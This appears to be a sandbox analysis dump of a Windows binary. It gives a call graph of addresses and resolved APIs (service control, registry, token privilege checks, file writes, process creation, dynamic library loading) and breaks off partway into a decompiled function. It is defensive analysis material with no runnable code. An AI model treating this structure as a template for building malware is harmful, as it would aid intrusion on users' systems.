41ad2b RtlAllocateHeap 16983->16984 16985 41acdc 16983->16985 16984->16799 16987 41a600 2 API calls 16985->16987 16988 41ad23 16987->16988 16988->16984 16990 41c6fd RegOpenKeyExA 16989->16990 16991 41c69c 16989->16991 16990->16801 16993 41c580 4 API calls 16991->16993 16994 41c6f5 16993->16994 16994->16990 16996 41b8ef 16995->16996 16997 41b943 16995->16997 16996->16996 16998 41a600 2 API calls 16996->16998 16997->16802 16998->16997 17000 41c794 16999->17000 17001 41c72c 16999->17001 17000->16806 17000->16813 17002 41c580 4 API calls 17001->17002 17002->17000 17004 41edd0 17003->17004 17004->17004 17059 41d0a0 17004->17059 17006 41edee 17007 41edf5 17006->17007 17008 41ee0a 17006->17008 17009 41b8e0 2 API calls 17007->17009 17065 41d130 17008->17065 17011 41edfa 17009->17011 17011->16808 17012 41ee17 17013 41ee38 17012->17013 17014 41ee1d 17012->17014 17075 41d260 17013->17075 17015 41b8e0 2 API calls 17014->17015 17017 41ee22 17015->17017 17071 41d1c0 17017->17071 17020 41ee71 17022 41d1c0 4 API calls 17020->17022 17021 41ee50 17024 41b8e0 2 API calls 17021->17024 17025 41ee77 17022->17025 17026 41ee55 17024->17026 17028 41d1c0 4 API calls 17025->17028 17027 41d1c0 4 API calls 17026->17027 17029 41ee61 17027->17029 17030 41ee7d 17028->17030 17031 41d1c0 4 API calls 17029->17031 17030->16808 17032 41ee67 17031->17032 17032->16808 17034 41eee1 17033->17034 17034->17034 17079 41a7a0 17034->17079 17037 41ef21 17083 41a830 17037->17083 17038 41ef0d 17039 41b8e0 2 API calls 17038->17039 17042 41ef12 17039->17042 17042->16810 17043 41ef31 17087 41a8e0 17043->17087 17044 41ef4c 17046 41a8e0 3 API calls 17044->17046 17048 41ef51 17046->17048 17047 41ef36 17047->16810 17048->16810 17050 41adab RtlFreeHeap 17049->17050 17051 41ad5c 17049->17051 17050->16815 17053 41a600 2 API calls 17051->17053 17054 41ada3 17053->17054 17054->17050 17056 41c87c 17055->17056 17057 41c8cb 17055->17057 17058 41c580 4 API calls 17056->17058 17057->16818 17058->17057 17060 41d113 OpenSCManagerA 17059->17060 17061 41d0ac 17059->17061 17060->17006 17063 41c580 4 API calls 17061->17063 17064 41d10b 17063->17064 17064->17060 17066 41d19b OpenServiceA 17065->17066 17067 41d13c 17065->17067 17066->17012 17069 41c580 4 API calls 17067->17069 17070 41d193 17069->17070 17070->17066 17072 41d243 17071->17072 17073 41d1cc 17071->17073 17072->16808 17074 41c580 4 API calls 17073->17074 17074->17072 17076 41d270 17075->17076 17077 41d2f3 17075->17077 17078 41c580 4 API calls 17076->17078 17077->17020 17077->17021 17078->17077 17080 41a803 17079->17080 17081 41a7ac 17079->17081 17080->17037 17080->17038 17082 41a600 2 API calls 17081->17082 17082->17080 17084 41a840 17083->17084 17086 41a8b8 17083->17086 17085 41a600 2 API calls 17084->17085 17085->17086 17086->17043 17086->17044 17088 41a94b FindCloseChangeNotification 17087->17088 17089 41a8ec 17087->17089 17088->17047 17091 41a600 2 API calls 17089->17091 17092 41a943 17091->17092 17092->17088 17094 41d0a0 5 API calls 17093->17094 17095 41ed4f 17094->17095 17096 41ed55 17095->17096 17097 41ed66 17095->17097 17099 41b8e0 2 API calls 17096->17099 17098 41d130 5 API calls 17097->17098 17100 41ed73 17098->17100 17101 41ed5a 17099->17101 17102 41ed77 17100->17102 17103 41ed8e 17100->17103 17101->16846 17104 41b8e0 2 API calls 17102->17104 17105 41d1c0 4 API calls 17103->17105 17106 41ed7c 17104->17106 17107 41ed94 17105->17107 17108 41d1c0 4 API calls 17106->17108 17109 41d1c0 4 API calls 17107->17109 17110 41ed88 17108->17110 17111 41ed9a 17109->17111 17110->16846 17111->16846 17113 41e78c 17112->17113 17115 41e7f9 17112->17115 17116 41e6c0 17113->17116 17115->16791 17117 41e755 GetProcAddress 17116->17117 17118 41e6e5 LoadLibraryA 17116->17118 17119 41e778 17117->17119 17120 41e768 17117->17120 17118->17117 17123 41e73f 17118->17123 17119->17115 17120->17119 17122 41a720 2 API calls 17120->17122 17122->17119 17123->17117 17124 41a720 2 API calls 17123->17124 17125 41e750 17124->17125 17125->17117 17127 41b0e2 CreateProcessA 17126->17127 17128 41b07c 17126->17128 17127->16975 17130 41a600 2 API calls 17128->17130 17131 41b0da 17130->17131 17131->17127 17299 42551d 17300 42545a _fast_error_exit 34 API calls 17299->17300 17301 42552a 17300->17301 17833 40ac2e 17834 40ac36 17833->17834 17835 40ac63 17834->17835 17836 40ac3d 17834->17836 17837 402720 39 API calls 17835->17837 17853 41ae60 17836->17853 17841 40ac71 17837->17841 17839 40ac46 17840 40ac81 17861 40a7d0 17840->17861 17841->17840 17857 407b70 17841->17857 17844 40ac8e 17869 4083a0 17844->17869 17847 40acb6 17849 40acc3 17847->17849 17874 407500 17847->17874 17848 4083a0 39 API calls 17848->17847 17851 41ae60 2 API calls 17849->17851 17852 40accc 17851->17852 17854 41aec3 17853->17854 17855 41ae6c 17853->17855 17854->17839 17856 41a600 2 API calls 17855->17856 17856->17854 17858 407b80 17857->17858 17858->17858 17859 402810 39 API calls 17858->17859 17860 407b90 17859->17860 17860->17840 17862 40a7f8 17861->17862 17867 40a822 17862->17867 17891 401fc0 17862->17891 17863 402720 39 API calls 17864 40a843 17863->17864 17895 40a600 17864->17895 17867->17863 17868 40a85d 17867->17868 17868->17844 17974 4076d0 17869->17974 17875 407517 17874->17875 17876 40750e 17874->17876 17986 41b2d0 17875->17986 17876->17849 17878 40753b 17879 407542 17878->17879 17992 41c090 17878->17992 17879->17849 17881 407558 lstrcpy 17998 41b470 17881->17998 17884 4075ab 17885 41b470 3 API calls 17884->17885 17886 4075be 17885->17886 17887 41b470 3 API calls 17886->17887 17888 4075d1 17887->17888 17889 41a8e0 3 API calls 17888->17889 17890 4075d7 17889->17890 17890->17849 17892 401fce 17891->17892 17894 401fd3 17891->17894 17893 421b39 39 API calls 17892->17893 17893->17894 17894->17867 17896 40a60e 17895->17896 17897 40a62f 17895->17897 17940 4083e0 17896->17940 17899 40a672 17897->17899 17900 40a644 17897->17900 17903 40a676 17899->17903 17904 40a6ad 17899->17904 17950 4023d0 17900->17950 17901 40a625 17901->17868 17907 4023d0 39 API calls 17903->17907 17905 4023d0 39 API calls 17904->17905 17920 40a6b7 17905->17920 17910 40a683 17907->17910 17908 40a656 17913 4083e0 39 API calls 17908->17913 17909 40a788 17954 4086a0 17909->17954 17910->17909 17914 40a68b 17910->17914 17912 40a717 17915 4023d0 39 API calls 17912->17915 17917 40a666 17913->17917 17918 4083e0 39 API calls 17914->17918 17925 40a723 17915->17925 17916 40a795 17916->17868 17917->17868 17919 40a6a1 17918->17919 17919->17868 17920->17912 17921 4023d0 39 API calls 17920->17921 17922 40a6d8 17921->17922 17922->17912 17923 40a6dc 17922->17923 17926 40a702 17923->17926 17927 40a6ed 17923->17927 17924 40a74d 17929 40a773 17924->17929 17930 40a75e 17924->17930 17925->17909 17925->17924 17928 4023d0 39 API calls 17925->17928 17932 4083e0 39 API calls 17926->17932 17931 4083e0 39 API calls 17927->17931 17933 40a749 17928->17933 17936 4083e0 39 API calls 17929->17936 17934 4083e0 39 API calls 17930->17934 17935 40a6f6 17931->17935 17937 40a70b 17932->17937 17933->17909 17933->17924 17938 40a767 17934->17938 17935->17868 17939 40a77c 17936->17939 17937->17868 17938->17868 17939->17868 17941 408451 17940->17941 17942 408405 17940->17942 17966 408200 17941->17966 17943 402810 39 API calls 17942->17943 17945 408428 17943->17945 17946 4029a0 39 API calls 17945->17946 17947 40843a 17946->17947 17965 42246e RaiseException 17947->17965 17949 40846a 17949->17901 17951 4023dd 17950->17951 17952 401fc0 39 API calls 17951->17952 17953 4023f6 17952->17953 17953->17908 17953->17909 17963 4086c8 17954->17963 17955 4087a0 17958 401fc0 39 API calls 17955->17958 17956 40877c 17957 4083e0 39 API calls 17956->17957 17959 40878a 17957->17959 17960 4087ce 17958->17960 17959->17916 17961 4087fd 17960->17961 17962 4083e0 39 API calls 17960->17962 17961->17916 17964 4087e7 17962->17964 17963->17955 17963->17956 17964->17916 17965->17941 17967 421b15 39 API calls 17966->17967 17968 408228 17967->17968 17969 40825d 17968->17969 17971 407f60 17968->17971 17969->17949 17972 402720 39 API calls 17971->17972 17973 407f9e 17972->17973 17973->17969 17975 421b15 39 API calls 17974->17975 17976 4076d7 17975->17976 17977 407be0 17976->17977 17978 407c0c 17977->17978 17979 407c5d 17977->17979 17980 402810 39 API calls 17978->17980 17979->17847 17979->17848 17981 407c31 17980->17981 17982 4029a0 39 API calls 17981->17982 17983 407c46 17982->17983 17985 42246e RaiseException 17983->17985 17985->17979 17987 41b333 CreateFileA 17986->17987 17988 41b2dc 17986->17988 17987->17878 17990 41a600 2 API calls 17988->17990 17991 41b32b 17990->17991 17991->17987 17993 41c102 SetFilePointer 17992->17993 17994 41c09c 17992->17994 17993->17881 17996 41a600 2 API calls 17994->17996 17997 41c0fa 17996->17997 17997->17993 17999 41b4cb WriteFile 17998->17999 18000 41b47c 17998->18000 17999->17884 18002 41a600 2 API calls 18000->18002 18003 41b4c3 18002->18003 18003->17999 16743 41d130 16744 41d19b OpenServiceA 16743->16744 16745 41d13c 16743->16745 16747 41c580 4 API calls 16745->16747 16748 41d193 16747->16748 16748->16744 16749 41b2d0 16750 41b333 CreateFileA 16749->16750 16751 41b2dc 16749->16751 16753 41a600 2 API calls 16751->16753 16754 41b32b 16753->16754 16754->16750 16761 41bbd0 16762 41bc4b GetTempFileNameA 16761->16762 16763 41bbdc 16761->16763 16765 41a600 2 API calls 16763->16765 16766 41bc43 16765->16766 16766->16762 17292 4262db 17293 4262e8 17292->17293 17294 427472 __lock 34 API calls 17293->17294 17295 426302 17294->17295 17296 42631b 17295->17296 17297 427472 __lock 34 API calls 17295->17297 17297->17296 16149 41a8e0 16150 41a94b FindCloseChangeNotification 16149->16150 16151 41a8ec 16149->16151 16155 41a600 16151->16155 16154 41a943 16154->16150 16158 41a636 16155->16158 16156 41a6f6 GetProcAddress 16157 41a708 16156->16157 16157->16154 16158->16156 16158->16158 16159 41a69c LoadLibraryA 16158->16159 16160 41a6d0 16159->16160 16160->16156 18049 40acf0 18064 402360 18049->18064 18054 4076b0 39 API calls 18055 40ad5f 18054->18055 18056 4076b0 39 API calls 18055->18056 18057 40ad74 18056->18057 18070 41add0 18057->18070 18065 421b15 39 API calls 18064->18065 18066 402367 18065->18066 18067 4076b0 18066->18067 18068 421b15 39 API calls 18067->18068 18069 4076b7 18068->18069 18069->18054 18071 40ad97 18070->18071 18072 41addc 18070->18072 18074 408070 18071->18074 18073 41a600 2 API calls 18072->18073 18073->18071 18075 4080f3 18074->18075 18095 41ba80 18075->18095 18077 40811a 18078 402810 39 API calls 18077->18078 18079 408138 18078->18079 18080 40a890 18079->18080 18081 40a8bc 18080->18081 18082 41b2d0 3 API calls 18081->18082 18088 40a8d9 18082->18088 18083 40aa7c 18084 41c090 3 API calls 18084->18088 18085 41b3f0 LoadLibraryA GetProcAddress ReadFile 18085->18088 18086 40aa76 18087 41a8e0 3 API calls 18086->18087 18087->18083 18088->18083 18088->18084 18088->18085 18088->18086 18089 421b15 39 API calls 18088->18089 18090 402a60 39 API calls 18088->18090 18092 407b70 39 API calls 18088->18092 18093 40a7d0 39 API calls 18088->18093 18094 4083a0 39 API calls 18088->18094 18101 407a50 18088->18101 18089->18088 18090->18088 18092->18088 18093->18088 18094->18088 18096 41ba90 18095->18096 18097 41bb2b ExpandEnvironmentStringsA 18095->18097 18099 41a600 2 API calls 18096->18099 18097->18077 18100 41bb23 18099->18100 18100->18097 18102 407a5f 18101->18102 18103 401fc0 39 API calls 18102->18103 18104 407a88 18102->18104 18103->18104 18104->18088 16767 41b3f0 16768 41b44b ReadFile 16767->16768 16769 41b3fc 16767->16769 16771 41a600 2 API calls 16769->16771 16772 41b443 16771->16772 16772->16768 18109 413cf7 18110 413d01 18109->18110 18127 4121f0 18110->18127 18112 413d16 18138 412e80 18112->18138 18118 413d2d 18178 4122f0 18118->18178 18128 412270 18127->18128 18129 41ba80 3 API calls 18128->18129 18130 41229c 18129->18130 18131 41b2d0 3 API calls 18130->18131 18132 4122b5 18131->18132 18133 4122bc 18132->18133 18255 41b3f0 18132->18255 18133->18112 18135 4122da 18136 41a8e0 3 API calls 18135->18136 18137 4122e0 18136->18137 18137->18112 18261 420d70 18138->18261 18142 412e8f 18299 41a960 18142->18299 18145 41a960 2 API calls 18146 41ecb1 18145->18146 18147 41a960 2 API calls 18146->18147 18148 41ecbf 18147->18148 18149 41a960 2 API calls 18148->18149 18150 41eccd 18149->18150 18151 41a960 2 API calls 18150->18151 18152 413d23 18151->18152 18153 412620 18152->18153 18351 4123f0 18153->18351 18155 41262b 18164 4127ea 18155->18164 18360 41b6c0 18155->18360 18157 412759 18158 41c690 5 API calls 18157->18158 18159 412786 18158->18159 18160 4127be lstrlen 18159->18160 18159->18164 18161 41c7d0 4 API calls 18160->18161 18162 4127e0 18161->18162 18163 41c870 4 API calls 18162->18163 18163->18164 18165 4198d0 18164->18165 18166 419940 18165->18166 18166->18166 18167 41ba80 3 API calls 18166->18167 18168 419975 18167->18168 18169 41b770 2 API calls 18168->18169 18171 41997f 18169->18171 18170 4199a4 LoadLibraryA 18173 4199d7 GetProcAddress 18170->18173 18174 4199b6 18170->18174 18171->18170 18364 419810 18171->18364 18176 41e780 4 API calls 18173->18176 18174->18118 18175 41999d 18175->18170 18177 419a13 18175->18177 18176->18177 18177->18118 18179 412370 18178->18179 18180 41ba80 3 API calls 18179->18180 18181 41239c GetLocalTime 18180->18181 18182 41b2d0 3 API calls 18181->18182 18183 4123c0 18182->18183 18184 41b470 3 API calls 18183->18184 18185 4123d6 18184->18185 18186 41a8e0 3 API calls 18185->18186 18187 4123dc 18186->18187 18188 412800 18187->18188 18189 412980 18188->18189 18386 41c8e0 18189->18386 18191 412a1b 18192 41b6c0 2 API calls 18191->18192 18193 412a2f 18192->18193 18394 41af50 18193->18394 18198 41c870 4 API calls 18198->18191 18200 41ba80 3 API calls 18201 412ae7 18200->18201 18398 41aee0 18201->18398 18204 41ba80 3 API calls 18205 412b9f 18204->18205 18206 41aee0 2 API calls 18205->18206 18207 412bac 18206->18207 18208 41ba80 3 API calls 18207->18208 18209 412c51 18208->18209 18210 41aee0 2 API calls 18209->18210 18211 412c5e 18210->18211 18212 41af50 2 API calls 18211->18212 18213 412c72 18211->18213 18212->18213 18214 41ba80 3 API calls 18213->18214 18215 412d0f 18214->18215 18216 41aee0 2 API calls 18215->18216 18217 412d1c 18216->18217 18218 41ba80 3 API calls 18217->18218 18219 412db7 18218->18219 18220 41aee0 2 API calls 18219->18220 18221 412dc4 18220->18221 18222 41ba80 3 API calls 18221->18222 18223 412e60 18222->18223 18224 41aee0 2 API calls 18223->18224 18225 412e6d 18224->18225 18226 41ece0 18225->18226 18402 41a9d0 18226->18402 18229 41a9d0 2 API calls 18230 41ed07 18229->18230 18231 41a9d0 2 API calls 18230->18231 18232 41ed15 18231->18232 18233 41a9d0 2 API calls 18232->18233 18234 41ed23 18233->18234 18235 41a9d0 2 API calls 18234->18235 18236 413d4f 18235->18236 18237 421310 18236->18237 18238 421337 18237->18238 18239 41b810 2 API calls 18238->18239 18240 421376 18239->18240 18406 421000 18240->18406 18242 421396 18243 41aee0 2 API calls 18242->18243 18244 421439 18243->18244 18245 41af50 2 API calls 18244->18245 18246 42144a 18244->18246 18245->18246 18247 41aee0 2 API calls 18246->18247 18248 4214e9 18247->18248 18249 41af50 2 API calls 18248->18249 18250 4214fa 18248->18250 18249->18250 18251 41aee0 2 API calls 18250->18251 18252 421599 18251->18252 18253 413d54 18252->18253 18254 41af50 2 API calls 18252->18254 18254->18253 18256 41b44b ReadFile 18255->18256 18257 41b3fc 18255->18257 18256->18135 18259 41a600 2 API calls 18257->18259 18260 41b443 18259->18260 18260->18256 18303 41b810 18261->18303 18263 420d8a 18307 41b770 18263->18307 18267 420e47 18268 41b770 2 API calls 18267->18268 18269 420ee9 18268->18269 18270 4209e0 7 API calls 18269->18270 18271 420f07 18269->18271 18270->18271 18272 41b770 2 API calls 18271->18272 18273 420fa9 18272->18273 18274 420fc7 18273->18274 18276 4209e0 7 API calls 18273->18276 18333 420ac0 18274->18333 18276->18274 18277 412e85 18278 420970 18277->18278 18279 420984 18278->18279 18280 42097d 18278->18280 18281 41f4c0 10 API calls 18279->18281 18280->18142 18282 42098c 18281->18282 18283 41f760 10 API calls 18282->18283 18284 420995 18283->18284 18285 41fb20 6 API calls 18284->18285 18286 42099e 18285->18286 18287 41fc20 10 API calls 18286->18287 18288 4209a7 18287->18288 18289 420220 10 API calls 18288->18289 18290 4209b0 18289->18290 18291 420480 10 API calls 18290->18291 18292 4209b9 18291->18292 18293 420760 9 API calls 18292->18293 18294 4209c2 18293->18294 18295 41f2b0 6 API calls 18294->18295 18296 4209cb 18295->18296 18297 41f040 7 API calls 18296->18297 18298 4209d2 18297->18298 18298->18142 18300 41a9b3 18299->18300 18301 41a96c 18299->18301 18300->18145 18302 41a600 2 API calls 18301->18302 18302->18300 18305 41b834 18303->18305 18304 41b8c4 18304->18263 18305->18304 18305->18305 18306 41a600 2 API calls 18305->18306 18306->18304 18308 41b77c 18307->18308 18310 41b7f3 18307->18310 18309 41a600 2 API calls 18308->18309 18309->18310 18310->18267 18311 4209e0 18310->18311 18312 41ac50 2 API calls 18311->18312 18313 4209ef 18312->18313 18314 41acd0 3 API calls 18313->18314 18316 4209f5 18314->18316 18315 4209fb 18315->18267 18316->18315 18317 41b2d0 3 API calls 18316->18317 18318 420a48 18317->18318 18319 420a64 18318->18319 18320 420a4f 18318->18320 18321 41b470 3 API calls 18319->18321 18322 41ac50 2 API calls 18320->18322 18323 420a8f 18321->18323 18324 420a57 18322->18324 18327 41ac50 2 API calls 18323->18327 18325 41ad50 3 API calls 18324->18325 18326 420a5d 18325->18326 18326->18267 18328 420aad 18327->18328 18329 41ad50 3 API calls 18328->18329 18330 420ab3 18329->18330 18331 41a8e0 3 API calls 18330->18331 18332 420ab9 18331->18332 18332->18267 18334 420b10 18333->18334 18335 41c690 5 API calls 18334->18335 18336 420cab 18335->18336 18337 420ce8 18336->18337 18338 41c720 4 API calls 18336->18338 18337->18277 18339 420cda 18338->18339 18340 420cde 18339->18340 18342 420cf3 18339->18342 18341 41c870 4 API calls 18340->18341 18341->18337 18347 41c7d0 18342->18347 18345 41c870 4 API calls 18346 420d64 18345->18346 18346->18277 18348 41c7dc 18347->18348 18349 41c83a 18347->18349 18350 41c580 4 API calls 18348->18350 18349->18345 18350->18349 18352 4124f4 18351->18352 18353 41c690 5 API calls 18352->18353 18355 412527 18353->18355 18354 412609 18354->18155 18355->18354 18356 41c720 4 API calls 18355->18356 18357 4125ea 18356->18357 18358 41c870 4 API calls 18357->18358 18359 4125fd 18358->18359 18359->18155 18361 41b743 18360->18361 18362 41b6cc 18360->18362 18361->18157 18363 41a600 2 API calls 18362->18363 18363->18361 18365 41ac50 2 API calls 18364->18365 18366 41981f 18365->18366 18367 41acd0 3 API calls 18366->18367 18368 419825 18367->18368 18369 41982b 18368->18369 18370 41b2d0 3 API calls 18368->18370 18369->18175 18371 419878 18370->18371 18372 419894 18371->18372 18373 41987f 18371->18373 18375 41b470 3 API calls 18372->18375 18374 41ac50 2 API calls 18373->18374 18376 419887 18374->18376 18377 4198a3 18375->18377 18378 41ad50 3 API calls 18376->18378 18380 41ac50 2 API calls 18377->18380 18379 41988d 18378->18379 18379->18175 18381 4198b5 18380->18381 18382 41ad50 3 API calls 18381->18382 18383 4198bb 18382->18383 18384 41a8e0 3 API calls 18383->18384 18385 4198c1 18384->18385 18385->18175 18387 41c8ec 18386->18387 18389 4129af 18386->18389 18388 41c580 4 API calls 18387->18388 18388->18389 18389->18191 18390 41c960 18389->18390 18391 412a11 18390->18391 18392 41c96c 18390->18392 18391->18198 18393 41c580 4 API calls 18392->18393 18393->18391 18395 412a40 18394->18395 18396 41af5c 18394->18396 18395->18200 18397 41a600 2 API calls 18396->18397 18397->18395 18399 412af4 18398->18399 18400 41aeec 18398->18400 18399->18204 18401 41a600 2 API calls 18400->18401 18401->18399 18403 41a9f4 18402->18403 18403->18403 18404 41aa54 18403->18404 18405 41a600 2 API calls 18403->18405 18404->18229 18405->18404 18407 421050 18406->18407 18408 41c690 5 API calls 18407->18408 18409 421204 18408->18409 18410 421236 18409->18410 18411 41c720 4 API calls 18409->18411 18410->18242 18412 421228 18411->18412 18413 42122c 18412->18413 18419 421240 18412->18419 18414 41c870 4 API calls 18413->18414 18414->18410 18415 41c7d0 4 API calls 18416 4212eb 18415->18416 18417 41c870 4 API calls 18416->18417 18418 4212fc 18417->18418 18418->18242 18419->18415 16181 41ba80 16182 41ba90 16181->16182 16183 41bb2b ExpandEnvironmentStringsA 16181->16183 16185 41a600 2 API calls 16182->16185 16186 41bb23 16185->16186 16186->16183 16187 423f8a SetUnhandledExceptionFilter 16737 41c090 16738 41c102 SetFilePointer 16737->16738 16739 41c09c 16737->16739 16741 41a600 2 API calls 16739->16741 16742 41c0fa 16741->16742 16742->16738 16755 41c690 16756 41c6fd RegOpenKeyExA 16755->16756 16757 41c69c 16755->16757 16759 41c580 4 API calls 16757->16759 16760 41c6f5 16759->16760 16760->16756 17132 42fe90 17137 41e900 17132->17137 17135 4228af 38 API calls 17136 42fea4 17135->17136 17138 41e974 17137->17138 17138->17138 17153 4215c0 17138->17153 17140 41ebe9 17141 41a7a0 2 API calls 17140->17141 17142 41ec07 17141->17142 17143 41a7a0 2 API calls 17142->17143 17144 41ec21 17143->17144 17145 41a7a0 2 API calls 17144->17145 17146 41ec3b 17145->17146 17147 41a7a0 2 API calls 17146->17147 17148 41ec55 17147->17148 17149 41a7a0 2 API calls 17148->17149 17150 41ec6f 17149->17150 17247 421b00 17150->17247 17154 41ac50 2 API calls 17153->17154 17155 421617 17154->17155 17156 41acd0 3 API calls 17155->17156 17157 421623 17156->17157 17158 42162e 17157->17158 17159 41acd0 3 API calls 17157->17159 17158->17140 17160 421647 17159->17160 17161 421651 17160->17161 17162 421665 17160->17162 17163 41ad50 3 API calls 17161->17163 17164 41acd0 3 API calls 17162->17164 17165 421659 17163->17165 17166 421672 17164->17166 17165->17140 17167 421696 17166->17167 17168 42167a 17166->17168 17170 41acd0 3 API calls 17167->17170 17169 41ad50 3 API calls 17168->17169 17172 421682 17169->17172 17171 4216a3 17170->17171 17173 4216d5 17171->17173 17174 4216a9 17171->17174 17175 41ad50 3 API calls 17172->17175 17177 41acd0 3 API calls 17173->17177 17176 41ad50 3 API calls 17174->17176 17178 42168a 17175->17178 17179 4216b5 17176->17179 17180 4216df 17177->17180 17178->17140 17181 41ad50 3 API calls 17179->17181 17182 4216e5 17180->17182 17183 421719 17180->17183 17184 4216bd 17181->17184 17186 41ad50 3 API calls 17182->17186 17185 41acd0 3 API calls 17183->17185 17187 41ad50 3 API calls 17184->17187 17188 421726 17185->17188 17189 4216f1 17186->17189 17190 4216c9 17187->17190 17191 42176c 17188->17191 17192 42172c 17188->17192 17193 41ad50 3 API calls 17189->17193 17190->17140 17250 41cc50 17191->17250 17195 41ad50 3 API calls 17192->17195 17196 4216f9 17193->17196 17199 421738 17195->17199 17197 41ad50 3 API calls 17196->17197 17200 421705 17197->17200 17201 41ad50 3 API calls 17199->17201 17202 41ad50 3 API calls 17200->17202 17204 421744 17201->17204 17246 42170d 17202->17246 17206 41ad50 3 API calls 17204->17206 17208 421750 17206->17208 17210 41ad50 3 API calls 17208->17210 17211 421758 17210->17211 17212 41ad50 3 API calls 17211->17212 17214 421760 17212->17214 17214->17140 17215 4217cb 17216 41cd20 5 API calls 17215->17216 17215->17246 17217 4217ee 17216->17217 17218 41cd20 5 API calls 17217->17218 17217->17246 17219 42180d 17218->17219 17219->17246 17268 41cdd0 17219->17268 17224 421880 AllocateAndInitializeSid 17226 4218bf 17224->17226 17224->17246 17225 421851 17225->17140 17226->17246 17276 41d3c0 17226->17276 17231 421935 AllocateAndInitializeSid 17232 421962 17231->17232 17231->17246 17233 41d3c0 4 API calls 17232->17233 17232->17246 17234 42199b 17233->17234 17235 41cf70 4 API calls 17234->17235 17236 4219d0 17235->17236 17237 4219d4 17236->17237 17238 4219fe AllocateAndInitializeSid 17236->17238 17237->17140 17239 421a24 17238->17239 17240 421a4d 17238->17240 17239->17140 17241 41d3c0 4 API calls 17240->17241 17240->17246 17242 421a86 17241->17242 17243 41cf70 4 API calls 17242->17243 17244 421abb 17243->17244 17244->17246 17284 41cfe0 17244->17284 17246->17140 17288 41b250 17247->17288 17251 41cc63 17250->17251 17252 41cd02 17250->17252 17253 41c580 4 API calls 17251->17253 17252->17246 17254 41afe0 17252->17254 17253->17252 17255 41b058 17254->17255 17256 41afec 17254->17256 17258 41c9f0 17255->17258 17257 41a600 2 API calls 17256->17257 17257->17255 17259 41ca11 17258->17259 17259->17259 17260 41ca93 17259->17260 17261 41c580 4 API calls 17259->17261 17260->17246 17262 41cd20 17260->17262 17261->17260 17263 41cdab GetTokenInformation 17262->17263 17264 41cd2c 17262->17264 17263->17215 17266 41c580 4 API calls 17264->17266 17267 41cda3 17266->17267 17267->17263 17269 41cde0 17268->17269 17271 41ce76 17268->17271 17270 41c580 4 API calls 17269->17270 17270->17271 17271->17246 17272 41cea0 17271->17272 17273 41cf47 17272->17273 17274 41ceb0 17272->17274 17273->17224 17273->17225 17274->17274 17275 41c580 4 API calls 17274->17275 17275->17273 17277 41d423 17276->17277 17278 41d3cc 17276->17278 17280 41cf70 17277->17280 17279 41c580 4 API calls 17278->17279 17279->17277 17281 41cfb3 17280->17281 17282 41cf7c 17280->17282 17281->17231 17281->17246 17283 41c580 4 API calls 17282->17283 17283->17281 17285 41cff0 17284->17285 17286 41d084 17284->17286 17287 41c580 4 API calls 17285->17287 17286->17246 17287->17286 17289 41b25c 17288->17289 17290 41b2b6 17288->17290 17291 41a600 2 API calls 17289->17291 17290->17135 17291->17290 16161 41d0a0 16162 41d113 OpenSCManagerA 16161->16162 16163 41d0ac 16161->16163 16167 41c580 16163->16167 16169 41c5b6 16167->16169 16168 41c65f GetProcAddress 16170 41c681 16168->16170 16171 41c671 16168->16171 16169->16168 16169->16169 16172 41c61e LoadLibraryA 16169->16172 16170->16162 16171->16170 16174 41a720 2 API calls 16171->16174 16172->16168 16173 41c642 16172->16173 16173->16168 16177 41a720 16173->16177 16174->16170 16178 41a783 16177->16178 16179 41a72c 16177->16179 16178->16168 16180 41a600 2 API calls 16179->16180 16180->16178 19566 4019b0 19567 401ac4 19566->19567 19594 4017f0 19567->19594 19569 401ae9 19570 401d9d 19569->19570 19571 41ac50 2 API calls 19569->19571 19572 401b06 19571->19572 19573 41acd0 3 API calls 19572->19573 19592 401b0c 19573->19592 19574 401b14 19575 401d8b 19576 41ac50 2 API calls 19575->19576 19577 401d97 19576->19577 19578 41ad50 3 API calls 19577->19578 19578->19570 19579 41b960 2 API calls 19579->19592 19581 41d5f0 4 API calls 19581->19592 19582 41d680 4 API calls 19582->19592 19583 41d730 4 API calls 19583->19592 19586 41b2d0 3 API calls 19586->19592 19587 41b470 3 API calls 19587->19592 19588 41a8e0 LoadLibraryA GetProcAddress FindCloseChangeNotification 19588->19592 19589 41b070 3 API calls 19589->19592 19590 41aee0 2 API calls 19590->19592 19591 41d7d0 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 19591->19592 19592->19574 19592->19575 19592->19579 19592->19581 19592->19582 19592->19583 19592->19586 19592->19587 19592->19588 19592->19589 19592->19590 19592->19591 19593 4018e0 LoadLibraryA GetProcAddress FindCloseChangeNotification CreateFileA ExpandEnvironmentStringsA 19592->19593 19603 41d510 19592->19603 19607 41bb50 19592->19607 19611 41bbd0 19592->19611 19593->19592 19595 401864 19594->19595 19596 41ba80 3 API calls 19595->19596 19597 4018a3 19596->19597 19598 41b2d0 3 API calls 19597->19598 19599 4018bc 19598->19599 19600 4018c2 19599->19600 19601 41a8e0 3 API calls 19599->19601 19600->19569 19602 4018d1 19601->19602 19602->19569 19605 41d528 19603->19605 19604 41d5c8 19604->19592 19605->19604 19605->19605 19606 41d440 4 API calls 19605->19606 19606->19604 19608 41bbb3 19607->19608 19609 41bb5c 19607->19609 19608->19592 19610 41a600 2 API calls 19609->19610 19610->19608 19612 41bc4b GetTempFileNameA 19611->19612 19613 41bbdc 19611->19613 19612->19592 19615 41a600 2 API calls 19613->19615 19616 41bc43 19615->19616 19616->19612

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 83 41f2b0-41f31f 84 41f321-41f32a 83->84 84->84 85 41f32c-41f339 84->85 86 41f343-41f348 85->86 87 41f33b-41f342 85->87 88 41f350-41f363 LoadLibraryA 86->88 89 41f34a-41f34e 86->89 90 41f365-41f379 GetProcAddress 88->90 91 41f37b-41f382 88->91 89->88 89->91 90->91 92 41f383-41f39c call 41e780 90->92 95 41f3a0-41f3ad 92->95 96 41f39e 92->96 96->95
                                                                    C-Code - Quality: 100%
                                                                    			E0041F2B0(void* __ecx) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				intOrPtr _t37;
                                                                    				struct HINSTANCE__* _t41;
                                                                    				_Unknown_base(*)()* _t43;
